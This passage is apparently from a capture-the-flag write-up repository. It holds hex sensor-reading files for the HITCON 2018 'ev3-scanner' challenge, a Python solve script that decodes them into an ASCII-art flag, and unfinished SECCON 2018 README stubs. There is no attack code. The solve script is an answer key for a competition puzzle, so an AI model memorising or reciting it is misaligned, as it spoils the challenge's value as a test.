07002a00020000c040 70 | 07002a00020000c040 71 | 07002a00020000c040 72 | 07002a00020000803f 73 | 07002a00020000803f 74 | 07002a00020000803f 75 | 07002a00020000803f 76 | 07002a00020000803f 77 | 07002a00020000803f 78 | 07002a00020000803f 79 | 07002a00020000c040 80 | 07002a00020000c040 81 | 07002a00020000c040 82 | 07002a00020000c040 83 | 07002a00020000c040 84 | 07002a00020000803f 85 | 07002a00020000803f 86 | 07002a00020000c040 87 | 07002a00020000c040 88 | 07002a00020000c040 89 | 07002a00020000c040 90 | 07002a00020000c040 91 | 07002a000200004040 92 | 07002a00020000803f 93 | 07002a00020000803f 94 | 07002a000200000040 95 | 07002a00020000c040 96 | 07002a00020000c040 97 | 07002a00020000803f 98 | 07002a00020000c040 99 | 07002a00020000c040 100 | 07002a00020000c040 101 | 07002a00020000803f 102 | 07002a00020000803f 103 | 07002a00020000803f 104 | 07002a00020000803f 105 | 07002a00020000803f 106 | 07002a00020000803f 107 | 07002a000200000040 108 | 07002a00020000c040 109 | 07002a00020000c040 110 | 07002a00020000c040 111 | 07002a00020000c040 112 | 07002a00020000803f 113 | 07002a00020000c040 114 | 07002a00020000c040 115 | 07002a00020000c040 116 | 07002a00020000c040 117 | 07002a00020000c040 118 | 07002a00020000803f 119 | 07002a00020000c040 120 | 07002a00020000c040 121 | 07002a00020000c040 122 | 07002a00020000c040 123 | 07002a00020000c040 124 | 07002a00020000803f 125 | 07002a00020000803f 126 | 07002a00020000803f 127 | 07002a00020000803f 128 | 07002a00020000803f 129 | 07002a00020000803f 130 | 07002a000200000040 131 | 07002a00020000c040 132 | 07002a00020000c040 133 | 07002a00020000c040 134 | 07002a00020000c040 135 | 07002a00020000c040 136 | 07002a00020000803f 137 | 07002a00020000803f 138 | 07002a00020000c040 139 | 07002a00020000c040 140 | 07002a00020000c040 141 | 07002a000200008040 142 | 07002a00020000803f 143 | 07002a00020000803f 144 | 07002a00020000803f 145 | 07002a00020000803f 146 | 07002a00020000803f 147 | 07002a00020000c040 148 | 07002a000200008040 149 | 07002a00020000803f 150 | 07002a00020000803f 151 | 07002a00020000803f 152 | 07002a00020000803f 153 | 07002a00020000803f 154 | 07002a00020000803f 155 | 07002a00020000c040 156 | 07002a00020000c040 157 | 07002a00020000c040 158 | 07002a00020000803f 159 | 07002a00020000803f 160 | 07002a00020000803f 161 | 07002a00020000803f 162 | 07002a00020000c040 163 | 07002a00020000c040 164 | 07002a00020000c040 165 | 07002a00020000c040 166 | 07002a00020000c040 167 | 07002a000200008040 168 | 07002a00020000803f 169 | 07002a00020000803f 170 | 07002a000200000040 171 | 07002a000200000040 172 | 07002a00020000c040 173 | 07002a00020000c040 174 | 07002a00020000c040 175 | 07002a00020000c040 176 | 07002a00020000c040 177 | 07002a00020000c040 178 | 07002a00020000c040 179 | 07002a00020000c040 180 | 07002a00020000c040 181 | 07002a00020000c040 182 | 07002a00020000c040 183 | 07002a00020000c040 184 | 07002a00020000803f 185 | 07002a00020000c040 186 | 07002a00020000c040 187 | 07002a000200008040 188 | 07002a000200008040 189 | 07002a000200008040 -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line5.txt: -------------------------------------------------------------------------------- 1 | 07002a00020000c040 2 | 07002a00020000c040 3 | 07002a00020000c040 4 | 07002a00020000803f 5 | 07002a00020000803f 6 | 07002a00020000803f 7 | 07002a000200008040 8 | 07002a000200008040 9 | 07002a000200008040 10 | 07002a00020000c040 11 | 07002a00020000c040 12 | 07002a00020000803f 13 | 07002a000200000040 14 | 07002a00020000c040 15 | 07002a00020000c040 16 | 07002a00020000c040 17 | 07002a00020000c040 18 | 07002a00020000c040 19 | 07002a00020000c040 20 | 07002a00020000c040 21 | 07002a00020000c040 22 | 07002a00020000c040 23 | 07002a00020000c040 24 | 07002a00020000c040 25 | 07002a00020000c040 26 | 07002a00020000c040 27 | 07002a00020000c040 28 | 07002a00020000c040 29 | 07002a00020000c040 30 | 07002a00020000c040 31 | 07002a00020000c040 32 | 07002a00020000c040 33 | 07002a00020000c040 34 | 07002a00020000c040 35 | 07002a00020000c040 36 | 07002a00020000c040 37 | 07002a00020000c040 38 | 07002a00020000c040 39 | 07002a00020000c040 40 | 07002a00020000c040 41 | 07002a00020000c040 42 | 07002a00020000c040 43 | 07002a00020000c040 44 | 07002a00020000c040 45 | 07002a00020000c040 46 | 07002a00020000c040 47 | 07002a00020000c040 48 | 07002a00020000c040 49 | 07002a00020000c040 50 | 07002a00020000c040 51 | 07002a00020000c040 52 | 07002a00020000c040 53 | 07002a00020000c040 54 | 07002a00020000c040 55 | 07002a00020000c040 56 | 07002a00020000c040 57 | 07002a00020000c040 58 | 07002a00020000c040 59 | 07002a00020000c040 60 | 07002a00020000803f 61 | 07002a00020000803f 62 | 07002a00020000803f 63 | 07002a00020000803f 64 | 07002a00020000c040 65 | 07002a00020000c040 66 | 07002a00020000c040 67 | 07002a00020000803f 68 | 07002a00020000803f 69 | 07002a00020000803f 70 | 07002a00020000803f 71 | 07002a00020000803f 72 | 07002a00020000803f 73 | 07002a00020000803f 74 | 07002a00020000c040 75 | 07002a00020000c040 76 | 07002a000200004040 77 | 07002a00020000803f 78 | 07002a00020000c040 79 | 07002a00020000c040 80 | 07002a00020000c040 81 | 07002a00020000c040 82 | 07002a00020000c040 83 | 07002a00020000c040 84 | 07002a00020000c040 85 | 07002a000200008040 86 | 07002a00020000803f 87 | 07002a00020000c040 88 | 07002a00020000c040 89 | 07002a00020000c040 90 | 07002a00020000803f 91 | 07002a00020000803f 92 | 07002a00020000803f 93 | 07002a00020000803f 94 | 07002a00020000803f 95 | 07002a00020000803f 96 | 07002a000200000040 97 | 07002a00020000c040 98 | 07002a00020000c040 99 | 07002a00020000803f 100 | 07002a00020000803f 101 | 07002a00020000803f 102 | 07002a00020000803f 103 | 07002a00020000803f 104 | 07002a00020000803f 105 | 07002a00020000803f 106 | 07002a00020000c040 107 | 07002a00020000c040 108 | 07002a00020000c040 109 | 07002a00020000803f 110 | 07002a000200000040 111 | 07002a00020000c040 112 | 07002a00020000c040 113 | 07002a00020000c040 114 | 07002a00020000c040 115 | 07002a00020000803f 116 | 07002a000200000040 117 | 07002a00020000c040 118 | 07002a00020000c040 119 | 07002a00020000803f 120 | 07002a00020000803f 121 | 07002a00020000803f 122 | 07002a00020000803f 123 | 07002a00020000803f 124 | 07002a00020000803f 125 | 07002a000200000040 126 | 07002a00020000c040 127 | 07002a00020000c040 128 | 07002a00020000803f 129 | 07002a00020000803f 130 | 07002a00020000803f 131 | 07002a00020000803f 132 | 07002a00020000803f 133 | 07002a00020000803f 134 | 07002a00020000803f 135 | 07002a000200000040 136 | 07002a00020000c040 137 | 07002a00020000c040 138 | 07002a00020000803f 139 | 07002a00020000803f 140 | 07002a00020000803f 141 | 07002a00020000803f 142 | 07002a00020000803f 143 | 07002a00020000803f 144 | 07002a00020000c040 145 | 07002a00020000c040 146 | 07002a00020000c040 147 | 07002a00020000803f 148 | 07002a00020000c040 149 | 07002a00020000c040 150 | 07002a00020000c040 151 | 07002a00020000c040 152 | 07002a00020000c040 153 | 07002a00020000803f 154 | 07002a00020000c040 155 | 07002a00020000c040 156 | 07002a00020000c040 157 | 07002a00020000803f 158 | 07002a00020000803f 159 | 07002a00020000803f 160 | 07002a00020000803f 161 | 07002a00020000803f 162 | 07002a00020000803f 163 | 07002a00020000c040 164 | 07002a00020000c040 165 | 07002a00020000c040 166 | 07002a00020000803f 167 | 07002a000200000040 168 | 07002a00020000c040 169 | 07002a00020000c040 170 | 07002a00020000c040 171 | 07002a00020000803f 172 | 07002a000200000040 173 | 07002a00020000c040 174 | 07002a00020000c040 175 | 07002a00020000803f 176 | 07002a00020000803f 177 | 07002a00020000803f 178 | 07002a00020000803f 179 | 07002a00020000803f 180 | 07002a00020000803f 181 | 07002a000200000040 182 | 07002a00020000c040 183 | 07002a00020000c040 184 | 07002a00020000803f 185 | 07002a00020000803f 186 | 07002a00020000803f 187 | 07002a00020000803f 188 | 07002a00020000803f 189 | 07002a00020000c040 190 | 07002a00020000c040 191 | 07002a00020000c040 192 | 07002a00020000c040 193 | 07002a00020000c040 194 | 07002a00020000c040 195 | 07002a00020000c040 -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line6.txt: -------------------------------------------------------------------------------- 1 | 07002a00020000c040 2 | 07002a00020000c040 3 | 07002a00020000c040 4 | 07002a00020000c040 5 | 07002a00020000c040 6 | 07002a00020000c040 7 | 07002a00020000803f 8 | 07002a00020000803f 9 | 07002a00020000c040 10 | 07002a00020000c040 11 | 07002a00020000c040 12 | 07002a00020000c040 13 | 07002a00020000c040 14 | 07002a00020000c040 15 | 07002a00020000c040 16 | 07002a00020000c040 17 | 07002a00020000c040 18 | 07002a00020000c040 19 | 07002a00020000803f 20 | 07002a000200000040 21 | 07002a00020000c040 22 | 07002a00020000c040 23 | 07002a00020000c040 24 | 07002a00020000803f 25 | 07002a00020000803f 26 | 07002a00020000c040 27 | 07002a00020000c040 28 | 07002a00020000803f 29 | 07002a000200000040 30 | 07002a00020000c040 31 | 07002a00020000c040 32 | 07002a00020000c040 33 | 07002a00020000c040 34 | 07002a00020000c040 35 | 07002a00020000c040 36 | 07002a00020000c040 37 | 07002a00020000803f 38 | 07002a000200000040 39 | 07002a00020000c040 40 | 07002a00020000c040 41 | 07002a000200004040 42 | 07002a00020000803f 43 | 07002a00020000c040 44 | 07002a00020000c040 45 | 07002a00020000c040 46 | 07002a00020000c040 47 | 07002a000200008040 48 | 07002a00020000803f 49 | 07002a00020000c040 50 | 07002a00020000c040 51 | 07002a00020000c040 52 | 07002a00020000c040 53 | 07002a00020000c040 54 | 07002a00020000c040 55 | 07002a00020000c040 56 | 07002a00020000c040 57 | 07002a00020000803f 58 | 07002a00020000c040 59 | 07002a00020000c040 60 | 07002a00020000803f 61 | 07002a00020000c040 62 | 07002a00020000c040 63 | 07002a00020000c040 64 | 07002a00020000c040 65 | 07002a00020000c040 66 | 07002a00020000803f 67 | 07002a000200000040 68 | 07002a00020000c040 69 | 07002a00020000c040 70 | 07002a000200004040 71 | 07002a00020000803f 72 | 07002a00020000c040 73 | 07002a00020000c040 74 | 07002a00020000c040 75 | 07002a00020000c040 76 | 07002a00020000803f 77 | 07002a00020000c040 78 | 07002a00020000c040 79 | 07002a00020000c040 80 | 07002a00020000803f 81 | 07002a00020000c040 82 | 07002a00020000c040 83 | 07002a00020000c040 84 | 07002a000200004040 85 | 07002a00020000803f 86 | 07002a00020000c040 87 | 07002a00020000c040 88 | 07002a00020000c040 89 | 07002a00020000c040 90 | 07002a00020000c040 91 | 07002a00020000c040 92 | 07002a00020000c040 93 | 07002a00020000c040 94 | 07002a00020000c040 95 | 07002a00020000803f 96 | 07002a00020000c040 97 | 07002a00020000c040 98 | 07002a000200004040 99 | 07002a00020000803f 100 | 07002a00020000c040 101 | 07002a00020000c040 102 | 07002a00020000c040 103 | 07002a00020000c040 104 | 07002a00020000c040 105 | 07002a00020000c040 106 | 07002a00020000c040 107 | 07002a00020000c040 108 | 07002a00020000803f 109 | 07002a000200008040 110 | 07002a00020000c040 111 | 07002a00020000c040 112 | 07002a00020000c040 113 | 07002a00020000c040 114 | 07002a00020000c040 115 | 07002a00020000c040 116 | 07002a00020000803f 117 | 07002a00020000803f 118 | 07002a00020000c040 119 | 07002a00020000c040 120 | 07002a00020000c040 121 | 07002a00020000c040 122 | 07002a00020000c040 123 | 07002a00020000c040 124 | 07002a00020000c040 125 | 07002a00020000c040 126 | 07002a000200004040 127 | 07002a00020000803f 128 | 07002a00020000c040 129 | 07002a00020000c040 130 | 07002a00020000c040 131 | 07002a00020000c040 132 | 07002a00020000c040 133 | 07002a00020000803f 134 | 07002a00020000803f 135 | 07002a00020000c040 136 | 07002a00020000c040 137 | 07002a00020000c040 138 | 07002a00020000c040 139 | 07002a00020000c040 140 | 07002a00020000c040 141 | 07002a00020000c040 142 | 07002a00020000c040 143 | 07002a00020000c040 144 | 07002a00020000c040 145 | 07002a00020000c040 146 | 07002a00020000c040 147 | 07002a00020000c040 148 | 07002a00020000c040 149 | 07002a00020000c040 150 | 07002a00020000c040 151 | 07002a00020000c040 152 | 07002a00020000c040 153 | 07002a00020000c040 154 | 07002a00020000c040 155 | 07002a00020000c040 156 | 07002a00020000c040 157 | 07002a00020000c040 158 | 07002a00020000c040 159 | 07002a00020000c040 160 | 07002a00020000c040 161 | 07002a00020000c040 162 | 07002a00020000c040 163 | 07002a00020000c040 164 | 07002a00020000c040 165 | 07002a00020000803f 166 | 07002a00020000803f 167 | 07002a00020000c040 168 | 07002a00020000c040 169 | 07002a00020000c040 170 | 07002a00020000c040 171 | 07002a00020000803f 172 | 07002a00020000803f 173 | 07002a00020000c040 174 | 07002a00020000c040 175 | 07002a00020000c040 176 | 07002a00020000c040 177 | 07002a00020000c040 178 | 07002a00020000c040 179 | 07002a00020000c040 180 | 07002a00020000c040 181 | 07002a00020000803f 182 | 07002a000200008040 183 | 07002a00020000c040 184 | 07002a000200008040 185 | 07002a000200008040 186 | 07002a000200008040 187 | 07002a000200008040 188 | 07002a000200008040 189 | 07002a000200008040 -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line7.txt: -------------------------------------------------------------------------------- 1 | 07002a000200008040 2 | 07002a000200008040 3 | 07002a000200008040 4 | 07002a00020000c040 5 | 07002a00020000c040 6 | 07002a00020000803f 7 | 07002a000200000040 8 | 07002a00020000c040 9 | 07002a00020000c040 10 | 07002a00020000c040 11 | 07002a00020000c040 12 | 07002a00020000c040 13 | 07002a00020000c040 14 | 07002a00020000c040 15 | 07002a00020000c040 16 | 07002a00020000c040 17 | 07002a00020000c040 18 | 07002a00020000c040 19 | 07002a00020000c040 20 | 07002a00020000803f 21 | 07002a00020000803f 22 | 07002a00020000803f 23 | 07002a00020000803f 24 | 07002a00020000803f 25 | 07002a00020000c040 26 | 07002a00020000c040 27 | 07002a00020000c040 28 | 07002a00020000c040 29 | 07002a00020000c040 30 | 07002a00020000c040 31 | 07002a00020000c040 32 | 07002a00020000c040 33 | 07002a00020000c040 34 | 07002a00020000c040 35 | 07002a00020000c040 36 | 07002a00020000c040 37 | 07002a00020000c040 38 | 07002a00020000c040 39 | 07002a00020000c040 40 | 07002a00020000c040 41 | 07002a00020000c040 42 | 07002a00020000c040 43 | 07002a00020000c040 44 | 07002a00020000c040 45 | 07002a00020000c040 46 | 07002a00020000c040 47 | 07002a00020000c040 48 | 07002a00020000c040 49 | 07002a00020000c040 50 | 07002a00020000c040 51 | 07002a00020000c040 52 | 07002a00020000c040 53 | 07002a00020000c040 54 | 07002a00020000803f 55 | 07002a000200000040 56 | 07002a00020000c040 57 | 07002a00020000c040 58 | 07002a00020000c040 59 | 07002a00020000c040 60 | 07002a00020000c040 61 | 07002a00020000803f 62 | 07002a00020000c040 63 | 07002a00020000c040 64 | 07002a00020000c040 65 | 07002a00020000c040 66 | 07002a00020000c040 67 | 07002a00020000c040 68 | 07002a00020000c040 69 | 07002a00020000c040 70 | 07002a00020000c040 71 | 07002a000200008040 72 | 07002a00020000803f 73 | 07002a00020000c040 74 | 07002a00020000c040 75 | 07002a00020000c040 76 | 07002a00020000c040 77 | 07002a00020000c040 78 | 07002a00020000803f 79 | 07002a00020000803f 80 | 07002a00020000c040 81 | 07002a00020000c040 82 | 07002a00020000c040 83 | 07002a00020000c040 84 | 07002a00020000c040 85 | 07002a00020000c040 86 | 07002a00020000c040 87 | 07002a00020000c040 88 | 07002a00020000c040 89 | 07002a00020000803f 90 | 07002a00020000c040 91 | 07002a00020000c040 92 | 07002a00020000c040 93 | 07002a00020000803f 94 | 07002a00020000c040 95 | 07002a00020000c040 96 | 07002a00020000c040 97 | 07002a00020000c040 98 | 07002a00020000c040 99 | 07002a00020000c040 100 | 07002a00020000c040 101 | 07002a00020000c040 102 | 07002a00020000c040 103 | 07002a00020000c040 104 | 07002a00020000c040 105 | 07002a00020000803f 106 | 07002a00020000c040 107 | 07002a00020000803f 108 | 07002a000200000040 109 | 07002a00020000c040 110 | 07002a00020000c040 111 | 07002a00020000c040 112 | 07002a00020000c040 113 | 07002a00020000803f 114 | 07002a00020000c040 115 | 07002a00020000c040 116 | 07002a00020000c040 117 | 07002a00020000c040 118 | 07002a000200004040 119 | 07002a000200000040 120 | 07002a00020000c040 121 | 07002a00020000c040 122 | 07002a000200008040 123 | 07002a00020000803f 124 | 07002a00020000c040 125 | 07002a00020000c040 126 | 07002a00020000c040 127 | 07002a00020000c040 128 | 07002a000200004040 129 | 07002a00020000803f 130 | 07002a00020000c040 131 | 07002a00020000c040 132 | 07002a00020000803f 133 | 07002a00020000c040 134 | 07002a00020000c040 135 | 07002a00020000c040 136 | 07002a00020000c040 137 | 07002a00020000c040 138 | 07002a00020000c040 139 | 07002a00020000c040 140 | 07002a00020000c040 141 | 07002a00020000803f 142 | 07002a000200000040 143 | 07002a00020000c040 144 | 07002a00020000c040 145 | 07002a00020000c040 146 | 07002a00020000c040 147 | 07002a00020000803f 148 | 07002a00020000c040 149 | 07002a00020000c040 150 | 07002a00020000c040 151 | 07002a00020000803f 152 | 07002a000200008040 153 | 07002a00020000c040 154 | 07002a00020000c040 155 | 07002a00020000c040 156 | 07002a00020000c040 157 | 07002a00020000c040 158 | 07002a00020000c040 159 | 07002a00020000c040 160 | 07002a00020000803f 161 | 07002a000200008040 162 | 07002a00020000803f 163 | 07002a00020000c040 164 | 07002a00020000c040 165 | 07002a00020000c040 166 | 07002a00020000c040 167 | 07002a00020000c040 168 | 07002a00020000c040 169 | 07002a00020000803f 170 | 07002a00020000c040 171 | 07002a00020000c040 172 | 07002a00020000c040 173 | 07002a00020000c040 174 | 07002a00020000c040 175 | 07002a00020000c040 176 | 07002a00020000c040 177 | 07002a00020000c040 178 | 07002a00020000c040 179 | 07002a00020000c040 180 | 07002a00020000c040 181 | 07002a00020000803f 182 | 07002a00020000c040 183 | 07002a00020000c040 184 | 07002a00020000c040 185 | 07002a00020000c040 186 | 07002a00020000c040 187 | 07002a00020000c040 188 | 07002a00020000c040 189 | 07002a00020000c040 -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line8.txt: -------------------------------------------------------------------------------- 1 | 07002a00020000c040 2 | 07002a00020000c040 3 | 07002a00020000c040 4 | 07002a00020000c040 5 | 07002a00020000c040 6 | 07002a00020000803f 7 | 07002a00020000803f 8 | 07002a00020000803f 9 | 07002a00020000c040 10 | 07002a00020000c040 11 | 07002a00020000c040 12 | 07002a00020000c040 13 | 07002a00020000c040 14 | 07002a00020000c040 15 | 07002a00020000803f 16 | 07002a00020000803f 17 | 07002a00020000803f 18 | 07002a00020000803f 19 | 07002a00020000803f 20 | 07002a00020000803f 21 | 07002a00020000c040 22 | 07002a00020000c040 23 | 07002a00020000c040 24 | 07002a00020000c040 25 | 07002a00020000c040 26 | 07002a00020000c040 27 | 07002a00020000803f 28 | 07002a00020000803f 29 | 07002a00020000803f 30 | 07002a00020000c040 31 | 07002a00020000c040 32 | 07002a00020000c040 33 | 07002a00020000c040 34 | 07002a00020000c040 35 | 07002a00020000c040 36 | 07002a00020000c040 37 | 07002a000200004040 38 | 07002a00020000803f 39 | 07002a00020000c040 40 | 07002a00020000c040 41 | 07002a00020000c040 42 | 07002a00020000803f 43 | 07002a00020000c040 44 | 07002a00020000c040 45 | 07002a00020000c040 46 | 07002a00020000c040 47 | 07002a000200008040 48 | 07002a00020000803f 49 | 07002a00020000c040 50 | 07002a00020000c040 51 | 07002a00020000c040 52 | 07002a00020000803f 53 | 07002a00020000803f 54 | 07002a00020000803f 55 | 07002a00020000803f 56 | 07002a00020000803f 57 | 07002a00020000803f 58 | 07002a00020000c040 59 | 07002a00020000c040 60 | 07002a000200004040 61 | 07002a000200000040 62 | 07002a00020000c040 63 | 07002a00020000c040 64 | 07002a00020000c040 65 | 07002a00020000c040 66 | 07002a000200004040 67 | 07002a00020000803f 68 | 07002a00020000c040 69 | 07002a00020000c040 70 | 07002a00020000c040 71 | 07002a00020000803f 72 | 07002a00020000803f 73 | 07002a00020000803f 74 | 07002a00020000803f 75 | 07002a00020000803f 76 | 07002a00020000803f 77 | 07002a000200000040 78 | 07002a00020000c040 79 | 07002a00020000c040 80 | 07002a00020000c040 81 | 07002a00020000c040 82 | 07002a000200008040 83 | 07002a00020000803f 84 | 07002a000200008040 85 | 07002a00020000c040 86 | 07002a00020000c040 87 | 07002a00020000c040 88 | 07002a00020000c040 89 | 07002a00020000c040 90 | 07002a00020000803f 91 | 07002a00020000803f 92 | 07002a00020000803f 93 | 07002a00020000c040 94 | 07002a00020000c040 95 | 07002a000200008040 96 | 07002a00020000803f 97 | 07002a00020000c040 98 | 07002a00020000c040 99 | 07002a00020000803f 100 | 07002a00020000803f 101 | 07002a00020000803f 102 | 07002a00020000803f 103 | 07002a00020000803f 104 | 07002a00020000803f 105 | 07002a00020000803f 106 | 07002a00020000c040 107 | 07002a00020000c040 108 | 07002a00020000c040 109 | 07002a00020000c040 110 | 07002a000200004040 111 | 07002a00020000803f 112 | 07002a00020000c040 113 | 07002a00020000c040 114 | 07002a00020000c040 115 | 07002a00020000c040 116 | 07002a00020000803f 117 | 07002a00020000c040 118 | 07002a00020000c040 119 | 07002a00020000c040 120 | 07002a00020000c040 121 | 07002a00020000c040 122 | 07002a00020000803f 123 | 07002a00020000803f 124 | 07002a00020000803f 125 | 07002a00020000803f 126 | 07002a00020000803f 127 | 07002a00020000803f 128 | 07002a000200000040 129 | 07002a00020000c040 130 | 07002a00020000c040 131 | 07002a00020000c040 132 | 07002a00020000c040 133 | 07002a00020000c040 134 | 07002a00020000803f 135 | 07002a00020000803f 136 | 07002a00020000803f 137 | 07002a00020000c040 138 | 07002a00020000c040 139 | 07002a000200004040 140 | 07002a00020000803f 141 | 07002a000200000040 142 | 07002a000200004040 143 | 07002a00020000803f 144 | 07002a00020000803f 145 | 07002a00020000c040 146 | 07002a000200004040 147 | 07002a00020000803f 148 | 07002a00020000803f 149 | 07002a00020000803f 150 | 07002a00020000803f 151 | 07002a00020000803f 152 | 07002a00020000803f 153 | 07002a00020000c040 154 | 07002a00020000c040 155 | 07002a00020000c040 156 | 07002a00020000803f 157 | 07002a00020000803f 158 | 07002a00020000803f 159 | 07002a00020000803f 160 | 07002a00020000c040 161 | 07002a00020000c040 162 | 07002a00020000c040 163 | 07002a00020000c040 164 | 07002a00020000c040 165 | 07002a00020000c040 166 | 07002a00020000c040 167 | 07002a00020000803f 168 | 07002a00020000c040 169 | 07002a00020000c040 170 | 07002a00020000c040 171 | 07002a00020000c040 172 | 07002a000200004040 173 | 07002a00020000803f 174 | 07002a00020000c040 175 | 07002a00020000c040 176 | 07002a00020000c040 177 | 07002a00020000803f 178 | 07002a00020000803f 179 | 07002a00020000803f 180 | 07002a00020000803f 181 | 07002a00020000803f 182 | 07002a00020000803f 183 | 07002a00020000803f 184 | 07002a00020000c040 185 | 07002a000200008040 186 | 07002a000200008040 187 | 07002a000200008040 188 | 07002a000200008040 189 | 07002a000200008040 -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line9.txt: -------------------------------------------------------------------------------- 1 | 07002a00020000c040 2 | 07002a000200008040 3 | 07002a000200008040 4 | 07002a00020000c040 5 | 07002a00020000c040 6 | 07002a00020000803f 7 | 07002a000200000040 8 | 07002a00020000c040 9 | 07002a00020000c040 10 | 07002a00020000c040 11 | 07002a00020000803f 12 | 07002a00020000803f 13 | 07002a00020000c040 14 | 07002a00020000c040 15 | 07002a00020000c040 16 | 07002a00020000803f 17 | 07002a00020000c040 18 | 07002a00020000c040 19 | 07002a00020000c040 20 | 07002a00020000c040 21 | 07002a00020000c040 22 | 07002a00020000803f 23 | 07002a00020000c040 24 | 07002a00020000c040 25 | 07002a00020000c040 26 | 07002a00020000c040 27 | 07002a00020000c040 28 | 07002a00020000c040 29 | 07002a00020000c040 30 | 07002a00020000803f 31 | 07002a00020000c040 32 | 07002a00020000c040 33 | 07002a00020000c040 34 | 07002a00020000c040 35 | 07002a00020000c040 36 | 07002a00020000c040 37 | 07002a00020000803f 38 | 07002a000200000040 39 | 07002a00020000c040 40 | 07002a00020000c040 41 | 07002a00020000c040 42 | 07002a00020000803f 43 | 07002a00020000c040 44 | 07002a000200004040 45 | 07002a00020000803f 46 | 07002a00020000c040 47 | 07002a00020000c040 48 | 07002a000200008040 49 | 07002a00020000803f 50 | 07002a00020000c040 51 | 07002a00020000c040 52 | 07002a00020000c040 53 | 07002a00020000c040 54 | 07002a00020000803f 55 | 07002a000200000040 56 | 07002a00020000c040 57 | 07002a00020000c040 58 | 07002a00020000c040 59 | 07002a00020000c040 60 | 07002a00020000c040 61 | 07002a00020000803f 62 | 07002a00020000c040 63 | 07002a00020000c040 64 | 07002a00020000c040 65 | 07002a00020000c040 66 | 07002a00020000c040 67 | 07002a00020000c040 68 | 07002a00020000c040 69 | 07002a00020000c040 70 | 07002a00020000c040 71 | 07002a00020000c040 72 | 07002a000200008040 73 | 07002a00020000803f 74 | 07002a00020000c040 75 | 07002a00020000c040 76 | 07002a00020000c040 77 | 07002a00020000803f 78 | 07002a000200008040 79 | 07002a00020000c040 80 | 07002a00020000c040 81 | 07002a00020000c040 82 | 07002a00020000c040 83 | 07002a00020000c040 84 | 07002a00020000c040 85 | 07002a00020000c040 86 | 07002a00020000c040 87 | 07002a00020000c040 88 | 07002a00020000c040 89 | 07002a00020000803f 90 | 07002a000200000040 91 | 07002a00020000c040 92 | 07002a00020000c040 93 | 07002a00020000803f 94 | 07002a00020000c040 95 | 07002a00020000c040 96 | 07002a00020000c040 97 | 07002a00020000c040 98 | 07002a00020000c040 99 | 07002a00020000803f 100 | 07002a000200000040 101 | 07002a00020000c040 102 | 07002a00020000c040 103 | 07002a00020000c040 104 | 07002a00020000c040 105 | 07002a00020000c040 106 | 07002a00020000803f 107 | 07002a00020000c040 108 | 07002a00020000c040 109 | 07002a00020000c040 110 | 07002a00020000c040 111 | 07002a00020000c040 112 | 07002a00020000803f 113 | 07002a000200008040 114 | 07002a00020000c040 115 | 07002a00020000c040 116 | 07002a00020000803f 117 | 07002a00020000c040 118 | 07002a00020000c040 119 | 07002a00020000c040 120 | 07002a00020000c040 121 | 07002a00020000c040 122 | 07002a00020000803f 123 | 07002a00020000c040 124 | 07002a00020000c040 125 | 07002a00020000c040 126 | 07002a00020000c040 127 | 07002a00020000c040 128 | 07002a00020000803f 129 | 07002a00020000c040 130 | 07002a00020000c040 131 | 07002a00020000c040 132 | 07002a00020000c040 133 | 07002a00020000c040 134 | 07002a00020000c040 135 | 07002a00020000c040 136 | 07002a000200008040 137 | 07002a00020000803f 138 | 07002a00020000c040 139 | 07002a00020000c040 140 | 07002a000200004040 141 | 07002a00020000803f 142 | 07002a00020000c040 143 | 07002a00020000c040 144 | 07002a00020000c040 145 | 07002a00020000c040 146 | 07002a000200004040 147 | 07002a00020000803f 148 | 07002a00020000c040 149 | 07002a00020000c040 150 | 07002a00020000c040 151 | 07002a00020000803f 152 | 07002a00020000c040 153 | 07002a00020000c040 154 | 07002a00020000c040 155 | 07002a00020000c040 156 | 07002a00020000c040 157 | 07002a00020000c040 158 | 07002a00020000c040 159 | 07002a00020000c040 160 | 07002a00020000803f 161 | 07002a00020000c040 162 | 07002a000200008040 163 | 07002a00020000803f 164 | 07002a000200000040 165 | 07002a00020000c040 166 | 07002a00020000c040 167 | 07002a00020000c040 168 | 07002a00020000c040 169 | 07002a00020000c040 170 | 07002a00020000c040 171 | 07002a00020000c040 172 | 07002a00020000c040 173 | 07002a00020000c040 174 | 07002a00020000803f 175 | 07002a00020000c040 176 | 07002a00020000c040 177 | 07002a00020000c040 178 | 07002a00020000c040 179 | 07002a00020000c040 180 | 07002a00020000c040 181 | 07002a00020000803f 182 | 07002a00020000803f 183 | 07002a00020000c040 184 | 07002a00020000c040 185 | 07002a00020000c040 186 | 07002a00020000c040 187 | 07002a00020000c040 188 | 07002a00020000c040 189 | 07002a00020000c040 -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/solve.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | flag = [] 4 | 5 | for i in range(1,13): 6 | temp = '' 7 | with open('line%d.txt' % i, 'rb') as fin: 8 | data = fin.readlines() 9 | for line in data: 10 | line = line.strip() 11 | num = int(line[-4:], 16) 12 | if abs(num - 0xc040) < 10: 13 | temp += ' ' 14 | elif abs(num - 0x803f) < 10: 15 | temp += '@' 16 | else: 17 | temp += '@' 18 | if (i%2 == 0): 19 | temp = temp[::-1] 20 | flag.append(temp) 21 | for line in flag: 22 | print line -------------------------------------------------------------------------------- /seccon2018/GhostKingdom/README.md: -------------------------------------------------------------------------------- 1 | # GhostKingdom 2 | --- 3 | **Points:** 248 | **Solves:** 67/653 | **Category:** Web 4 | 5 | http://ghostkingdom.pwn.seccon.jp/FLAG/ 6 | 7 | --- 8 | 9 | [Bahasa Indonesia](#bahasa-indonesia) 10 | 11 | ## English 12 | TODO 13 | 14 | 15 | ## Bahasa Indonesia 16 | TODO 17 | -------------------------------------------------------------------------------- /seccon2018/README.md: -------------------------------------------------------------------------------- 1 | # SECCON CTF 2018 Online Quals 2 | 3 | https://ctftime.org/event/683 4 | 5 | ## Crypto 6 | - [Boguscrypt (162)](boguscrypt) 7 | - [mnemonic (260)](mnemonic) 8 | 9 | ## Forensics 10 | - [Unzip (101)](unzip) 11 | - [History (145)](history) 12 | 13 | ## Pwn 14 | - [Classic Pwn (121)](classic-pwn) 15 | - [kindvm (255)](kindvm) 16 | - [Profile (255)](profile) 17 | 18 | ## QR 19 | - [QR Checker (222)](qr-checker) 20 | 21 | ## Reversing 22 | - [block (362)](block) 23 | - [Runme (102)](runme) 24 | - [shooter 